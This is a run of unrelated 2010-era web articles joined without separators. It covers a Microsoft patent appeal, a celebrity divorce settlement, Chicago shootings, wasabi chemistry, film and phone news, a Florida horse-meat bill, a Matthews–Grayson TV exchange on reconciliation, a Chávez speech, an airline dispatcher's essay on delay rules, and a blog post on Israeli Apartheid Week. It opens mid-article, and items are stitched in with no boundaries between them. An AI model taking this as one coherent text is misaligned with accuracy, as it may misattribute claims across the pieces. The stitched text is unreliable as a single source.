If that is refused then Microsoft can appeal again to the Supreme Court .
I4 i's patents date from 1998 and outline a way of " manipulating the architecture and the content of a document separately from each other " that invokes XML as the means of doing this .
I4 i founder Michel Vulpe said he was " pleased with the court 's continued decision to uphold the injunction " .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Former Dawson ’s Creek star James Van Der
Beek will be shelling out spousal support to his ex-wife for the next two - and - a - half years .
In a divorce settlement filed Monday in Los Angeles court it was revealed that Van Der Beek , 33 , will pay Heather Ann McComb $ 7,750 per month until December 2012 .
Get push notifications with news , features and more .
The papers say Van Der Beek ’s monthly income is $ 35,000 , compared with McComb ’s income of $ 1,750 a month .
In the settlement , Van Der Beek will keep their North Hollywood residence , all bank accounts in his name , and all residuals from his acting work and rights to his screenplays and other projects he ’s created .
The couple , who have no children together , separated last April .
PHOTOS : Split !
The Year ’s Biggest Breakups
Van Der Beek and McComb got engaged in early 2003 and were married over the Fourth of July weekend that year in Malibu .
CHICAGO ( AP )  Chicago police are investigating shootings around the city that left seven people dead and several more wounded within a matter of hours .
Police spokesman Hector Alfaro said the first shooting happened at about 6 p.m. Thursday and that the attacks continued into the early hours of Friday in various neighborhoods .
Alfaro said police believe the shootings that left five men and one woman dead are unrelated .
He said no arrests had been made as of early Friday .
At least two of the victims died in drive - by shootings , including 18 - year - old DeAndre Morgan who was killed as he pushed his son down the street in a stroller .
Two others were shot and wounded when someone in a pickup opened fire on a basketball game on the city 's South Side .
Copyright 2010 The Associated Press .
All rights reserved .
This material may not be published , broadcast , rewritten or redistributed .
Guidelines :
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
Read more
Text Size A A
Daryl Kahn Cline REAL DEAL
Wasabi rhizomes are best when finely grated just before use .
Because no sushi experience would be complete without that dollop of wasabi adding its zing , it may come as a surprise that most sushi lovers have never eaten real wasabi .
The pistachio - green paste on your plate might be called wasabi , but it ’s most likely just a mix of European horseradish , mustard , and food coloring .
Even in Japan , the home of wasabi , the real thing is in short supply .
“ Real ” wasabi comes from the rootlike stem , or rhizome ( think of fresh ginger ) , of Wasabia japonica .
As a member of the Cruciferae family , it is related to such plants as cabbage , cauliflower , broccoli , and mustard .
Its distant cousin European horseradish ( Armoracia rusticana ) often pinch - hits for it in culinary uses .
Wasabi grows naturally in mountain streambeds , and the Japanese have cultivated it for more than a millennium .
Wasabi grown in semiaquatic conditions is known as sawa , whereas wasabi grown in fields is called oka .
The stream - grown wasabi produces larger rhizomes and is generally considered to be of higher quality .
Unlike horseradish - based stand-ins , the heat of real wasabi dissipates quickly because of the volatility of the flavor components .
“ If you take imitation wasabi powder and add water , you can leave that almost overnight and it will still be hot , ” says Brian Oates , president and chief scientific officer of Pacific Coast Wasabi , in Vancouver , British Columbia .
“ With wasabi , when you grate it up , it ’s only good for , at most , 15 minutes . ”
The components of both wasabi and horseradish can be stabilized by acids , such as vinegar or lemon juice .
The key chemicals that give wasabi its characteristic heat and flavor are n’t present until the wasabi is macerated .
When the cell wall is disrupted , it releases the enzyme myrosinase , which hydrolyzes glucosinolates , a group of sulfur - containing glucose derivatives , to produce isothiocyanates that provide wasabi’s spicy zing .
The most abundant of these is allyl isothiocyanate .
“ Horseradish has a different profile of isothiocyanates , and it is possible to taste the difference , ” says Geoffrey P. Savage , an associate professor in the food group at Lincoln University , in Canterbury , New Zealand .
“ The problem is that not many people have tasted the original taste of wasabi , so they do n’t know what they are tasting . ”
One of the by - products of the myrosinase reaction is glucose .
“ You get a little bit of sweetness , ” Oates says .
“ Sometimes , I find it so hot that I do n’t know how anybody can detect the sweetness . ”
Shutterstock BRIGHT GREEN
Typical wasabi pastes are made from horseradish , mustard , and food coloring .
The flavor is affected by how finely the wasabi is grated .
The traditional way to grate wasabi is with a sharkskin grater , called an oroshi , which resembles fine sandpaper .
Because the flavor and heat dissipate so rapidly , it ’s best to grate it as you need it .
“ If you ’re sitting at a restaurant , you have your rhizome and your own grater , ” Oates says .
It might sound like it would be impossible to make a commercial product with real wasabi , but that ’s not the case , Oates says .
“ If you take the fresh stuff and simply freeze it and then freeze - dry it , you keep the enzyme and the substrate separate .
They do n’t get a chance to interact . ”
Savage and his coworkers have done a quantitative comparison of seven isothiocyanates in wasabi and horseradish .
The horseradish contained 1.9 g total isothiocyanate / kg , whereas wasabi contained nearly 10 % more ( 2.1 g/kg ) .
Allyl isothiocyanate was the major component in both .
The second most abundant isothiocyanate was 2 - phenylethyl isothiocyanate , but it was found only in the horseradish .
It , therefore , probably plays a major role in the flavor differences between the two plants .
Every other isothiocyanate was present at higher concentrations in wasabi than in horseradish .
In addition to its culinary uses , scientists have started investigating wasabi’s isothiocyanates , particularly 6 - methylsulfinylhexyl isothiocyanate , for possible medicinal uses .
It is thought to alleviate symptoms in a number of disorders , including allergies , asthma , cancer , inflammation , and neurodegenerative diseases , Oates says .
6 - Methylsulfinylhexyl isothiocyanate is believed to act on a transcription factor known as Nrf2 that is involved in the antioxidant response .
One of the challenges with wasabi is that it is difficult to cultivate .
Pacific Coast has begun cultivating sawa wasabi in greenhouses for the high - end culinary markets and oka wasabi for the nutraceutical market .
Pacific Coast and other companies such as Coppersfolly , in Canterbury , New Zealand ; Pacific Farms , in Florence , Ore. ; and Real Wasabi , in Bluffton , S.C. , are among the companies providing products made with real wasabi .
Pacific
Coast sells fresh and freeze - dried wasabi rhizomes ; Coppersfolly sells a jarred wasabi paste ; Pacific Farms sells fresh rhizomes and tubes of wasabi paste ; and Real Wasabi sells rhizomes , wasabi powder , and other condiments flavored with wasabi .
Maybe sushi lovers will finally be able to taste the real deal .
Jim Carrey and Ewan McGregor 's controversial comedy I Love You Phillip Morris has been shelved indefinitely in the US .
The film 's Stateside distributor Consolidated Pictures Group confirmed to the Los Angeles Times that they have postponed the release of Phillip Morris , which stars Jim Carrey as a gay con artist who falls in love with his prison cellmate ( Ewan McGregor ) .
Despite festival screenings at Sundance and Cannes , and a March 17 cinema release in the UK , CPG has pulled the plug on a planned April 30 US theatrical debut .
It is unclear if the film will make it to the big screen at all in North America or go straight to DVD and Blu-ray .
Phillip Morris made headlines last year when some US distribution firms declared their unease at its explicit gay sex scene between Carrey and McGregor 's characters .
This content is created and maintained by a third party , and imported onto this page to help users provide their email addresses .
You may be able to find more information about this and similar content at piano.io
The slaying of more than 20 pet horses in Florida for meat has prompted a bill being filed in the state legislature .
Florida Representative Luis Garcia ( D - Miami ) and Florida Senator Victor Crist ( R - Tampa ) have filed identical bills that would make horse slaughter illegal in the state .
The slaughter of horses for meat , centred around Miami - Dade County , has horrified horse owners across the state .
Authorities investigating the killings say the meat is likely being used to fulfill a strong illegal demand .
Horse meat can reportedly fetch up to $ US20 a pound .
The bills make it illegal to " knowingly transport , distribute , sell , purchase , or possess horsemeat for human consumption that is not clearly stamped , marked , and described as horsemeat for human consumption or horsemeat that is not acquired from a licensed slaughterhouse " .
Campaigner Richard Kouto has highlighted the plight of the animals and points to a string of illegal slaughterhouses operating in an area known as the C - 9 basin .
The market is likely fuelled by the high proportion of Miami - Dade residents of Cuban orgin .
Horse meat is commonly eaten in Cuba .
The iPhone is n't the only handset getting bumped today -- Google 's just outed a very , very significant update to the Nexus One that includes Google Goggles on board and a re-upped version of Google Maps that includes suggestions and a dedicated night mode .
Much more significantly , though , they 've capitulated and enabled multitouch in Browser , Gallery , and Maps -- great news and a big win for the Android community at large .
Finally , there are some 3G improvements in there , but you might have to wait a bit -- Google expects to have it rolled out to pretty much everyone toward the end of the week .
Seriously though , now that we 've gotten that whole multitouch spat cleared up , it 's time for Engadget to rally around something else : ridding the world of tiny ninjas , perhaps ?
Follow the break for a video of the new firmware -- in all its multi- fingered glory -- in action !
Update : ReadWriteWeb 's gotten an official statement from Google on the question on everyone 's mind : why now ?
The company says that Android 2.1 " powers a new class of devices " with more horsepower and bigger displays , and " based on these new capabilities and numerous requests from Android users , we decided to provide pinch - to - zoom capabilities with this new over - the - air software update for Nexus One devices . "
This sounds like a total cop -out to us -- HTC got multitouch working just fine on the Hero way back on 1.5 -- so we still think they just got uncomfortable with the noise surrounding the groundswell of demand for it .
Of course , that 's fine by us -- power to the people , right ?
“ The Vast of Night ” has an old school touch that thrills and captivates
MATTHEWS : Let 's bring in Democratic Congressman Alan Grayson of Florida .
Look , I 'm not sure ...
I think I know what that means , " Make the good fight , make your big pitch . "
They 've lost sight of the sales pitch in trying to get the thing made .
But you still are faced with the realities .
You do n't have the 60 votes to break the filibuster in the Senate .
Grayson : I do n't think we need 'em .
MATTHEWS : You do n't need 60 votes ?
Grayson :
We 've had a Congress now for 222 years .
How long has there been a filibuster - proof majority in the Senate ?
How long ?
You tell me .
You 're a student of history .
MATTHEWS : Well , it 's been a long time , and let me tell you , that 's why nothing ever gets through Congress .
[ Laughs . ]
GRAYSON : And the country somehow managed to function ...
MATTHEWS : Name me a major bill that Congress ever got through that was partisan .
GRAYSON : We got tax cuts for the rich from the Republicans with 51 votes ...
MATTHEWS : Easy !
Anybody can cut taxes !
That 's not hard .
GRAYSON : No , tax cuts for the rich .
Fifty - one votes .
MATTHEWS : It 's easy !
That 's easy !
GRAYSON : Well , it turns out that in the 222 year history of the Congress , we 've had a filibuster - proof majority for all of 14 years .
And somehow , we managed to pass legislation on all those other occasions .
MATTHEWS :
But you have n't created a major new program like health care for everybody .
Can you pass a major new program , like Medicare , in the current environment , where there 's such division .
GRAYSON : We not only can , we have to .
MATTHEWS : But that 's just talking !
How do you do it ?
GRAYSON : It 's not talking !
There are people dying in America every day because they have no health care .
MATTHEWS : OK , OK .
OK , you know , this show is about reality .
GRAYSON : Well , the reality is ...
MATTHEWS : Tell me how you pass this bill with 41 .
You just got a guy elected in Massachusetts who said ...
GRAYSON : Reconciliation needs 51 .
MATTHEWS : ... he signs his name " 41 . "
That means enough to stop this bill .
GRAYSON : Reconciliation needs 51 Senators .
MATTHEWS : What are you talking about ?
What procedure do you know that Harry Reid does n't know ?
GRAYSON : What makes you think Harry Reid 's not going to do it ?
I was calling for it six months ago .
MATTHEWS : That Dick Durbin does n't know ?
That all those top guys , that Ted Kennedy did n't know ?
GRAYSON : They said they 're not going to use reconciliation ?
MATTHEWS :
The secret route to the Indies that only you know about ?
GRAYSON : What are you talking about ?
MATTHEWS : These Senators can't do it !
GRAYSON : They 've been talking about this ...
MATTHEWS :
They 've said they can't do it .
GRAYSON : Why do you think they can't use reconciliation ?
MATTHEWS : Because you talk to any one of these Senators ... have you talked to any of them lately ?
And what do they tell you ?
What do the Democratic Senators
GRAYSON : You think I 'm their confessor ?
MATTHEWS : OK , you ever call up a Democratic Senator and say why do n't you do this by reconciliation ?
GRAYSON : What makes you think they 're not going to do it ?
What do you know that I do n't know ?
MATTHEWS : Because ... they 've refused to do it because they can not get past the filibuster rule .
The United States Senate is different than the House .
GRAYSON : I ...
MATTHEWS :
You 're allowed to talk as long as you want in the Senate .
GRAYSON : Not with reconciliation .
MATTHEWS : Unless you get cloture .
GRAYSON : With reconciliation it 's 51 votes , not 60 votes .
MATTHEWS : What do you mean , reconciliation ?
You can't create a program through reconciliation !
GRAYSON : You can create an amendment ...
MATTHEWS : Nobody 's ever done one !
GRAYSON : The bill 's already passed with 60 votes , you ...
MATTHEWS : Name a program that 's ...
GRAYSON : All you need to do is ...
MATTHEWS : Congressman , just name me the program that 's ever been created through reconciliation .
Name one !
One !
GRAYSON : As I said , tax cuts for the rich ...
MATTHEWS :
That 's not a program !
Under reconciliation , you 're allowed to do two things , change fiscal numbers .
You 're allowed to raise taxes , or cut program spending .
You can not create something .
GRAYSON : You 're saying that .
You do n't know that .
Nobody else thinks that .
MATTHEWS : I just spent three years on the Senate Budget Committee when I was a kid , let me tell you , you can't do it , and you can ask ...
By the way , have you asked any Senator this question ?
This program ... this plan you have ?
GRAYSON : I 'm in the other place ...
MATTHEWS :
Why do n't you run for the Senate and try to ...
GRAYSON : I 'm in the House , not the Senate .
MATTHEWS : I know , that 's why you 're not in the Senate .
In the Senate you have to do this thing ...
GRAYSON : Oh , that 's why I 'm not in the Senate !
OK , now I understand !
Well , we got that cleared up !
MATTHEWS : In the Senate , you have to get 60 votes .
Why do you think the Democrats fought like hell to get 60 votes ?
Why do you think the President and everybody else is dying over the fact that they lost Massachusetts ?
Because it did n't matter ?
You think they 're all crazy over there , but you 're smart ?
GRAYSON : No , I did n't say that .
What I 'm saying is that everyone 's been talking about reconciliation , and nobody has the guts to do it .
MATTHEWS : Name the United States Senator that 's willing to do this .
You keep talking about it ...
GRAYSON : I think that 's what you 'll probably see at this point .
MATTHEWS : [ Laughs . ]
Wanna bet ? [ Laughs . ]
Do you want to bet that they 're gonna do this ?
In other words , they killed themselves to get 60 votes , but now they 're gonna say all we need is 50 , and Biden to break the tie .
GRAYSON : They should n't have killed themselves to get 60 votes .
This is something they could 've done six months ago .
MATTHEWS :
This is netroots talk !
GRAYSON : No , look ...
MATTHEWS :
This is outsider talk , and you 're an elected official ...
GRAYSON : That 's not true .
That 's not true .
MATTHEWS : ... and you know you can't do it .
You 're pandering to the netroots right now .
I know what you 're doing !
GRAYSON : You are wrong !
This is something we talk about with the leadership in our caucus meetings every week !
MATTHEWS : OK , tell me how you 'd convince the United States Senate Democrats , 59 of them , to do what you want them to do .
How do you change their minds ?
Because they 've made up their minds .
GRAYSON : They want to pass the bill .
MATTHEWS : Yes ?
GRAYSON : The only way to pass the bill now is to use reconciliation .
MATTHEWS : Yes ?
And they 're gonna do this ?
GRAYSON : I think they will .
MATTHEWS :
When will they do this , because I want to write write this down .
When are they gonna do something that has never been done before ?
Create a program through this reconciliation process ?
GRAYSON : You know , they 've used reconciliation time and time again .
You 're saying create a program , as if that 's something dramatically different from everything else the Senate does .
It 's not .
MATTHEWS : OK , let me tell you , the purpose of reconciliation is to take measures -- cutting taxes , er , raising taxes or cutting spending -- to reconcile actual government spending and tax policy with previous legislation that you 've passed .
You have n't passed a bill to create a health care plan .
GRAYSON : When did you become the Senate parliamentarian ?
Did I miss that ?
MATTHEWS :
Well , I worked over there for many , many years , and I worked for the Speaker for six years , I worked 15 years up there ...
GRAYSON : Well , I 'm speaking to the Speaker and the leadership this year ...
MATTHEWS : ... and I know what I 'm talking about !
You ask anybody ... you ask anybody in the Senate right now ...
Go call the Senate legislative counsel 's office and ask them if you can do this .
Go ask the parliamentarians if you can do this .
You have n't bothered to do that .
GRAYSON : No , the leadership ...
MATTHEWS : [ Laughs . ]
GRAYSON : ... my leadership has done that .
And my answer is yes .
MATTHEWS : OK , this is a moot point .
OK , so in other words , there 's going to be a health care bill and it's gonna be passed by reconciliation .
You predict that ?
GRAYSON : I think that there 'll be an amendment passed by reconciliation .
We already have a bill passed , we just have to merge the two bills .
MATTHEWS :
And when will this happen so that we 'll get this thing done and stop arguing about it ?
GRAYSON : Thirty days or less .
MATTHEWS :
Thirty days or less , we will have a health care bill passed through the process of reconciliation ?
GRAYSON : I believe so .
MATTHEWS : You believe so .
GRAYSON : And I certainly hope so ...
MATTHEWS : You predict it ?
GRAYSON : ... because America needs it ?
MATTHEWS : You predict it ?
[ Laughs . ]
GRAYSON : It 's the most likely option at this point .
MATTHEWS : [ Laughing . ]
This is the problem , Congressman ...
GRAYSON : What ?
MATTHEWS : This is the problem .
Every night , we deal with two worlds : the real world of Congress , that has to do things and get things passed ; and this outside world , represented by the netroots and the other people out there , like yourself , who play this game ...
GRAYSON : What are you talking about ?
MATTHEWS : ... and it does n't get done !
[ Laughs . ]
GRAYSON : I sit in meetings with the Democratic Caucus week after week .
You talk about netroots , netroots , netroots !
I 'm telling you , this is what we 're talking about .
This is what the leadership is telling us .
MATTHEWS : OK , we 'll make a side bet .
It 's not gonna happen .
Anyway , Congressman Alan Grayson , a true believer , who believes he can get things done by willing it !
I
" Zamora lives , the struggle continues , " is the slogan that lives among our people .
There could not be a more propitious framework for enacting the Organic Law of Federal Government than the act of unveiling the statue of Sovereign People ’s General Ezequiel Zamora at the park El Calvario in Caracas .
Accompanying us on this bright day are representatives of community councils across the country , together with the Legislature .
It is 151 years since the start of the Federal War ( 1859 - 1863 ) : it was February 20 , 1859 when Tirso Salaverría commanded the Battle of Coro and then raised the cry of Federation .
We could n’t give Zamora a greater tribute then , than giving our people a law to help with their definitive liberation .
II
" I always put the community before the individual , " wrote our liberator Simón Bolívar on October 28 , 1828 to General Antonio José de Sucre .
This is the spirit and driving force of our current Bolivarianism : the communal and social are foremost above all things .
Simon Rodriguez was right when he said in his American Societies in 1828 : " You will see that there are two kinds of politics : popular and governmental : and that the people are more political than their governments . ”
Today we can say that we have a highly politicised society , in the true sense and meaning of the term , and that our Bolivarian Revolution is a direct consequence of such politicisation , whose point of rupture was on 27 February 1989 , the popular rebellion that on Saturday reaches its twenty - first anniversary .
Remember what the great Venezuelan revolutionary Kleber Ramirez said in the documentary ' History of February 4 ( 1998 ) - back in August 1992 in the purest Robinsonian spirit : " ... the time has come for communities to assume the powers of state , which will lead administratively to the total transformation of the Venezuelan state and socially to the real exercise of sovereignty by society through communal powers . ”
These are the reasons why this Saturday 20 February , we have enacted and launched the new Organic Law of the Federal Government Council .
With it we further open the door to advancing in the distribution of power in the hands of the people , and to achieving a more efficient and effective state , and , above all , unity to fulfil its functions under the constitution .
Over and over again I have said : the Venezuelan territorial reality must be transformed and , therefore , it is necessary to configure a new geometry of power that becomes a popular , communal and socialist restructuring of the geopolitics of the nation .
By socialism we mean unlimited democracy , following in this sense the great Portuguese theorist Boaventura de Sousa Santos .
From this comes our firm conviction that the best and most radically democratic of the options for defeating bureaucracy and corruption is the construction of a communal state which is able to test an alternative institutional structure at the same time as it permanently reinvents itself .
With this law , we must begin in earnest and in reality , as Garcia Bacca would say , to disassemble the entire corroded colonial scaffolding on which a territorial organisation was erected and that was intended to smash national unity to pieces .
And of course people 's power will play a major role ; I would say an essential role , in the radical transformation of our country .
III
Since the Land and Agricultural Development Law came into force in 2001 , the landowning oligarchy has launched a violent agenda against the rescue of common land and the full exercise of rights enshrined by the Land Law and the Constitution itself .
Faced with the backlash against the peasants via an escalation of attacks , sabotage and paid assassinations by the most retrograde forces in our society , the non-delegable duty of the Bolivarian national state and the revolutionary government is to protect the peasantry : to defend it with all means at its disposal .
The peasant militia has been created to fulfil that duty , placing emphasis on the protagonism and responsibility of the peasantry as a collective subject in function of their own defence .
The first exercises of the peasant militia , that we did in El Pao , Cojedes state last Friday , are just an initial indication of developing a popular armed force to safeguard our integrity and our sovereignty in the fields of Venezuela .
Who else but the community knows best the dynamics , activities , failures and essential aspects of safety in their locality ?
This is the same with geographical , spiritual and material issues .
The peasant militia and the Bolivarian Militia as a whole are not paramilitary forces , as the brainy analysts always try to suggest , even less so if we conceive of such a word within the reactionary Colombian semantics .
On the contrary , the Bolivarian Militia ( a body absolutely governed by the Law ) , as well as community councils , are expressions of the new communal state , an integral part of the new structure of the communal power we are building .
The Bolivarian Militias are a component of the Bolivarian Armed Forces and , therefore , do not undermine it , even less is there any intention to supplant it .
What bothers and annoys those who spread such lies is that the Armed Forces have been reunited with their original identity : the people in arms .
The Peasant Militia today embodies a transcendent principle : defending the homeland , our land .
Defence against any outside aggressor , but also against the internal aggressor who has been protected , for too long , in a real state of impunity that has counted with the venality of certain courts of the Republic which safeguard and protect the landowners and criminalise peasants and farmers who want to enforce the Land Law .
On 15 February , 191 years passed since the memorable speech at Angostura .
The Revolutionary War had not ended but the words of our Liberator embodied the recapture of our identity as a nation and the libertarian stamp was put on Venezuela .
Let ’s recall these brilliant lines which confirm the reason for our peasant militias , our Zamoran militias : " The chains of slavery have been broken , and Venezuela has been surrounded by new sons and daughters , grateful sons and daughters who have converted the tools of their captivity into weapons of freedom .
Yes , those who once were slaves , are free , those who once were enemies of a stepmother , are now advocates of a homeland . "
Let ’s go , with Zamora , with Robinson and Bolivar , towards a Communal State !
Towards socialism !
Venceremos !
Hugo Chávez Frías
21 February 2010
Translated by Kiraz Janicke , for Venezuelanalysis.com
We ’ve got a special guest post today from someone who is an aircraft dispatcher for a major US airline .
This person wrote in to me after my interview with Kate Hanni with an enlightening piece on lengthy ground delays that I thought would be of interest to everyone here .
Here is his take on things . . .
If folks want the systemic , “ big picture ” view of why the new 3 - hour limit is such a BAD idea , they need go no further than an airline ’s central dispatch office , or any air traffic control facility , and chat with the actual working dispatchers and air traffic controllers , respectively , who are the front - line troops in the annual weather war .
Dispatch is an airline ’s “ Mission Control ” center , and I ’ve worked in one as a dispatcher for upwards of 30 years .
A flight crew might operate 3 - 5 flights per day , but the average dispatcher works ten times that many flights in a single shift , and has a more - detailed awareness and understanding of the various problem areas within the airline ’s route system .
The dispatcher is also the one that plans the flight , including the routes , the alternates , and the fuel load , and is also the one passing along updated info to the crew while enroute .
When weather hits , we ’re also the ones that divert flights , and sometimes , if need be , we also cancel them .
There are two separate and distinct problems with delays , yet Ms. Hanni and her band of followers do n’t seem to be able to discern the critical differences between them .
In the last decade or so , there have been a handful of scenarios that produced 7 + hour delays , including , of course , the thunderstorms that caused Ms. Hanni ’s American flight to be diverted to Austin .
Admittedly , all the above situations were intolerable and handled poorly , and these are the “ apples ” when it comes to the issue of ground delays .
With respect to the delay Ms. Hanni suffered , I captured an image of the radar that night , and there was a big low pressure system anchored over west Texas resulting in a lengthy line of thunderstorms oriented north - to - south in central Texas .
I ’m sure Ms. Hanni and her ilk probably think a thunderstorm is a thunderstorm , but there are many variables associated with them that vary the net operational impact , such as coverage ( Isolated ?
Scattered ?
Broken ?
Solid line ? ) ; movement ; trend ; tops ( Permitting aircraft to fly over them , or not ) ; and the potential for the weather to “ train ” over the same location on the ground .
The cells in that line of thunderstorms in Texas the night of Ms. Hanni ’s flight moved south - to - north and kept DFW in the weather much longer than had this been the more typical line of thunderstorms one sees with an approaching cold front which quickly moves W - E or NW - SE .
I ’ve already mentioned the rare “ apples ” of the ground delay issues .
The “ oranges ” are the much more common 2 - 4 hour delays one sees when thunderstorms impact major airports or regions , especially on the east coast .
Ms. Hanni’s “ solution ” to the “ apples ” problem is NOT going to solve the “ oranges ” problem , yet I think the majority of Ms. Hanni ’s success with her movement has been the ability to tap into the general public ’s mistaken notions that ALL delays are equally evil no matter how short the duration ; that EVERY operational situation is predictable by the airline with 100 % accuracy ; and that ANYTIME anything goes wrong it ’s the automatic fault of the airline .
There is no one - size - fits all solution here .
Let ’s look at some common - sense tests , assumptions , misassumptions , and observations :
The general public can relate to the fact that their cross - town car trip will take 1 x time in good weather and with dry roads , 2 x time if it ’s raining , and maybe 3 x time if there ’s snow or ice .
Is it such a stretch to conclude that aircraft are similarly slowed down in such conditions ?
Does it make sense that airlines enjoy delays , or perhaps are they just forced to tolerate them , since ( last time I looked ) the airlines have no control over the weather ?
Nobody at an airline “ likes ” delays , but we realize that a good many of them are the unfortunate cost of doing business within the current ATC system .
( The “ oranges ” , not the “ apples . ” )
Likewise , does it make sense that airlines have the ability ( at 11:07 am ) to predict with absolute certainty that a thunderstorm ( or fog , or whatever ) will impact XYZ airport at 5:23 pm , or 6:03 pm , or 7:16 pm ?
Once bad weather starts occurring , will it end 1:23 from now , or 2:10 from now , or 3:33 from now ?
The concept of airspace capacity constraints is a foreign one to the general public , as they look up at all that sky and assume ( incorrectly ) that it has unlimited capacity .
All that open sky , and there ’s no room for my one flight ?
Again , that ’s an individual flight perspective , and one that ignores systemic issues .
As far as “ just returning to a gate ” and “ just getting some portable stairs and buses ” go , where can airlines ( and airports ) find the magic wands needed conjure up these extra resources ( and additional gates ) when needed on short notice ?
Should every airport have double the number of gates normally used “ just in case ” problems occur ?
Should Phoenix have the same number of snow plows that Anchorage does ?
What ’s reasonable for an airport to have ?
Airport capacity is a variable commodity , and not a constant one .
Look at the San Francisco airport acceptance rate ( AAR ) chart , for example .
Notice that the AAR ( a per hour figure ) can vary greatly depending upon what runway (s ) are , or are not in use .
AAR is the “ supply ” and the flights that airlines ( and non-airlines ) fly into the airport are the “ demand ” .
When demand is less than supply , things are good , but when the weather such as surface winds , cloud ceilings , visibilities change ( often suddenly , despite forecasts ) and drive a change to the runways in use that involve a drop in the AAR , demand then exceeds supply , and delays ensue .
Some flights in the air will need to circle , and may even have to divert .
Some flights that have n’t departed ( still on a gate , or on a taxiway awaiting departure ) will be delayed ( think metered freeway on ramp here ) .
If a thunderstorm event precludes aircraft from landing at XYZ airport for 2 hours , and XYZ normally handles 50 flights per hour , that ’s 100 flights that are going to be affected , and they do n’t just all disappear .
Some will be able to hold and get in , others will hold and divert to alternates .
Of those flights diverting , some will cancel , and some will refuel and try and go back to XYZ .
Once the weather improves at XYZ , ATC will be working a backlog of traffic — things do n’t immediately snap back to normal once the weather clears out .
If airline schedules are restricted such to always be able to fall within an airport ’s worst - case AAR , you ’ll be “ solving ” a problem that maybe occurs 20 % of the time and unnecessarily restricting things during the 80 % of the time when it ’s not warranted .
If we say it ’s foggy at XYZ and you tell the customer service agent the weather is OK at Aunt Tilly ’s house nearby , that ’s nice , but it ’s only relevant if we ’re shooting approaches to Aunt Tilly ’s house and landing in her driveway .
It ’s the weather at the airport that counts .
( You ’d be genuinely surprised at how often this comes up . )
One hears a great deal about “ NextGen ” ATC stuff , and while it will help in some operational contexts , it wo n’t in many others such as runway capacity .
Also , if one is trying to get from LaGuardia to O’Hare and there ’s a solid line of thunderstorms from Toronto to Atlanta topping 50,000 feet , it matters not whether the flight is navigating using VORs , GPS , Boy Scout compass , or taxiing on Interstate 80 – you ’re NOT going to get through the weather , and there will be delays .
Please keep in mind that airline employees are not all interchangeable .
Customer contact personnel do n’t have detailed knowledge of the specifics of ATC delays , only that there are ATC delays .
Likewise , many pilots only have their viewpoint of their specific flight , and not much awareness of any systemic issues .
It ’s no different than walking into a hospital .
It ’s unreasonable to expect detailed surgical questions to be answered by anyone other than by a surgeon — an admissions clerk wo n’t do–and it ’s unreasonable to expect that clerk to be trained to answer surgical questions .
In closing , I ’ll reiterate that nothing that I ’ve written should be construed as acceptance of the delay that Ms. Hanni and others experienced in that handful of really lengthy delay situations .
Irrespective of however well - meaning her efforts might have been , her pushing of a one - size - fits - all solution is going to end up being severely counter - productive .
By DOT ’s new 3 - hour rule and the huge fines the airlines are now facing , it is the height of financial irresponsibility ( if not insanity ) for any airline to risk allowing EACH aircraft that busts the 3 - hour limit to incur a multi-million dollar fine .
Pre-emptive cancellations will occur earlier than the 3 - hour mark , so as to ensure aircraft can get through any taxiway gridlock and get back to the gate before the bell does “ ding ” at 3 hours .
Before Israeli Apartheid Week ( IAW ) even began members of the Ontario Legislature and the Canadian Parliament are falling all over each other to denounce it .
I can't remember another time when elected legislators formally denounced a student activity like this .
Perhaps during the 1950's when McCarthyism was rampant but that was before my time .
Last week the Ontario Legislature unanimously passed a resolution denouncing Israel Apartheid Week submitted by PC Peter Shure who said calling Israel an apartheid state was " close to hate speech . "
While there were only 30 MPP's in the Legislature at the time , NDP MPP Cheri di Novo was one of them and spoke in favour of the resolution .
This week a Conservative MP is introducing a resolution calling IAW anti-Semitic .
Before I deal with why these unprecedented attacks are taking place , I 'd like to share with you a great talk I heard last night at Ryerson from Na'eem Jeena : , a leading activist and academic from South Africa who works for Palestinian solidarity .
He told us that South African apartheid had three pillars of apartheid and Israel shares all three .
1. Different rights for different races
In the case of Israel , it is different rights for Jews and for non-Jews .
For example the law of return of 1950 says Jews can return to Israel and be given citizenship even if they have no links to the country other than mythical biblical ones ; whereas Palestinians cannot return even if their parents or grandparents lived there .
2. Separation of so - called racial groups into different geographical areas .
Even within the borders of Israel , 93 percent of land is reserved as a national land trust or Jewish National Fund land is for the exclusive use of Jews .
The 20 percent of the population that is Palestinians living in Israel have to share access to the 7 percent of private land that is left .
The Israeli Supreme Court has made a number of decisions that Palestinians cannot live on Jewish lands .
There are not only residential areas that are banned to Palestinians but there are separate roads for Jews and Palestinians .
That was never true in South Africa even in times of crisis .
Moreover Palestinians have less access to water than Jews living nearby
Finally the movement of Palestinians is severely restricted much more so than were blacks in South Africa .
The famous pass laws in South Africa meant that Blacks had to show government issued passes to move around but Palestinians are even more restricted by walls and checkpoints and if they live in the Gaza Strip can't leave at all .
3. Security and Repression Matrix of Laws and Security .
There was serious repression in the Black townships but there were never tanks or planes buzzing overhead like there is in West Bank .
Israeli military violence against Palestinian communities .
says Jena , is far worse than anything suffered by Blacks in South Africa during apartheid .
If Israel is becoming a pariah in the world it is not because of anti-Semitism , it is because they are practicing a form of apartheid even more egregious than that practiced in South Africa .
Others have compiled comments from some of the most respected leaders of the anti-apartheid movement in South Africa who see what Israel is doing as apartheid .
There is a reason why the BDS is strongest in South African .
People there recognize apartheid when they see it .
Finally the UN Convention on Apartheid condemns the crime of apartheid that refers to a series of inhuman acts — including murder , torture , arbitrary arrest , illegal imprisonment , exploitation , marginalization , and persecution — committed for the purpose of establishing and maintaining the domination of one racial group by another .
If the shoe fits .
So why are politicians including some from the NDP setting a student activity like IAW in their sites ?
An all party coalition of parliamentarians has been holding hearings on what they call the " new anti-semitism , " by which they mean criticism of Israel .
They heard from every University President who appeared before them that there is no rise of anti-semitism on their campuses and yet the false rumours of such a rise persist because of the equation of criticism of Israel with anti-semitism .
" > Israel is beginning to see that the non-violent anti-apartheid and BDS ( Boycott , Divestment and Sanctions ) movement is a greater threat to their power than the any military threat .
In Israel and Palestine , they are moving to arrest non-violent activists who are leading the movement there .
And they are using all their economic and political power to push friendly governments to move against these protests .
But there is a problem .
It 's called democracy and freedom of speech .
However much you might disagree that Israel practices apartheid , you cannot shut down a discussion of the issue or a demonstration or disinvestment campaign against Israel because freedom of speech is a fundamental democratic right in most Western countries .
